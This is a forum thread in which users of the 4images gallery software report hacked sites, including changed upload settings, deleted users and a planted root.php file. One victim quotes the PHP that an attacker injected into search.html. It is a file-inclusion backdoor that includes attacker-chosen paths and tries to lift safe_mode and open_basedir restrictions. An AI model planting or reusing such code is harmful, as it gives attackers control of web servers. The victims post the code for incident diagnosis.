Think my settings got hacked

[impss]

 

some how my "Valid file extensions" was changed to only php , and php wasnt a option before.

and someone uploaded a php file to one of my catogories called root.php.

I thought i had done all the bug fixes for 1.7.1

Did i miss a possible bug fix that would allow those settings to be changed?

[ccsakuweb]

i think that my settings got hacked but in my case, someone deleted 50 users and their images, and changed the gallery language to english. I have 1.7.3 4images and i did all the bug fixes from the new version. is possible that there is a new bug??

[mawenzi]

... and do you have a safe admin account incl. safe admin password ... ?

[impss]

i belive i do..

more then 8 characters using upper and lower case and numbers

[ccsakuweb]

in my case, i have changed my password. and after i changed my password my website haven't got hacked.

[impss]

I also just noticed my seach.php file wasnt working.

So i looked into it , and he changed everything in my search.html  to:

Code: [Select]

<?php
$f=trim($f); 
echo ini_get("safe_mode"); 
echo ini_get("open_basedir"); 
include("$f"); 
ini_restore("safe_mode"); 
ini_restore("open_basedir"); 
echo ini_get("safe_mode"); 
echo ini_get("open_basedir"); 
include("$f"); 
include($_GET['x']);
?>
Anyone know how this could have happened?

Please somebody help.. i dont want this to happen again.